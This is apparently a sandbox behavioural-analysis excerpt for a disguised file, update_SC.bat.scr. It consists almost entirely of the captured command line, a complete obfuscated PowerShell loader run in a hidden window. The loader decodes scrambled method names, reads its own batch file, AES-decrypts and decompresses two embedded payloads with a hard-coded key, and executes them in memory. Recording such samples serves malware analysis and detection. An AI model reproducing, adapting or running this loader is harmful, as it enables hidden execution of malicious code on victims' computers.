Behavioral Analysis

update_SC.bat.scr "C:\Users\test22\AppData\Local\Temp\update_SC.bat.scr" -w hidden -c $JVpI='CrwbwxeawbwxtwbwxewbwxDwbwxecrwbwxyptwbwxorwbwx'.Replace('wbwx', '');$FsUB='GewbwxtwbwxCwbwxurwbwxrewbwxntPrwbwxowbwxcwbwxesswbwx'.Replace('wbwx', '');$OzxK='Spwbwxlwbwxitwbwx'.Replace('wbwx', '');$HAAG='Invwbwxokewbwx'.Replace('wbwx', '');$FFkA='EnwbwxtrywbwxPoiwbwxntwbwx'.Replace('wbwx', '');$WQSx='RewbwxadwbwxLinewbwxswbwx'.Replace('wbwx', '');$DEYb='ChanwbwxgeExwbwxtwbwxenwbwxsiowbwxnwbwx'.Replace('wbwx', '');$ZbJy='Loawbwxdwbwx'.Replace('wbwx', '');$uiDy='FrwbwxomBawbwxsewbwx64Stwbwxrinwbwxgwbwx'.Replace('wbwx', '');$eRmc='TrawbwxnswbwxforwbwxmFwbwxinwbwxawbwxlwbwxBlowbwxckwbwx'.Replace('wbwx', '');$qTbd='ElewbwxmwbwxentwbwxAtwbwx'.Replace('wbwx', '');$WBBe='MaiwbwxnMwbwxodwbwxulewbwx'.Replace('wbwx', '');function ugGJK($RZhEH){$wAzfW=[System.Security.Cryptography.Aes]::Create();$wAzfW.Mode=[System.Security.Cryptography.CipherMode]::CBC;$wAzfW.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$wAzfW.Key=[System.Convert]::$uiDy('tet9nbwKcJ4H6PSPZ0pG5xwbtojIGRT3Q4ePBrT3Xwk=');$wAzfW.IV=[System.Convert]::$uiDy('h2l7jJ1Xd8qRkIzzjzvfeg==');$wByJd=$wAzfW.$JVpI();$Ghgux=$wByJd.$eRmc($RZhEH,0,$RZhEH.Length);$wByJd.Dispose();$wAzfW.Dispose();$Ghgux;}function sfWiU($RZhEH){$kYBLB=New-Object System.IO.MemoryStream(,$RZhEH);$FzUKN=New-Object System.IO.MemoryStream;$qZTBl=New-Object System.IO.Compression.GZipStream($kYBLB,[IO.Compression.CompressionMode]::Decompress);$qZTBl.CopyTo($FzUKN);$qZTBl.Dispose();$kYBLB.Dispose();$FzUKN.Dispose();$FzUKN.ToArray();}$tZpKu=[System.Linq.Enumerable]::$qTbd([System.IO.File]::$WQSx([System.IO.Path]::$DEYb([System.Diagnostics.Process]::$FsUB().$WBBe.FileName, $null)), 1);$gAaoc=$tZpKu.Substring(2).$OzxK(':');$wZsGz=sfWiU (ugGJK ([Convert]::$uiDy($gAaoc[0])));$jIzLe=sfWiU (ugGJK ([Convert]::$uiDy($gAaoc[1])));[System.Reflection.Assembly]::$ZbJy([byte[]]$jIzLe).$FFkA.$HAAG($null,$null);[System.Reflection.Assembly]::$ZbJy([byte[]]$wZsGz).$FFkA.$HAAG($null,$null);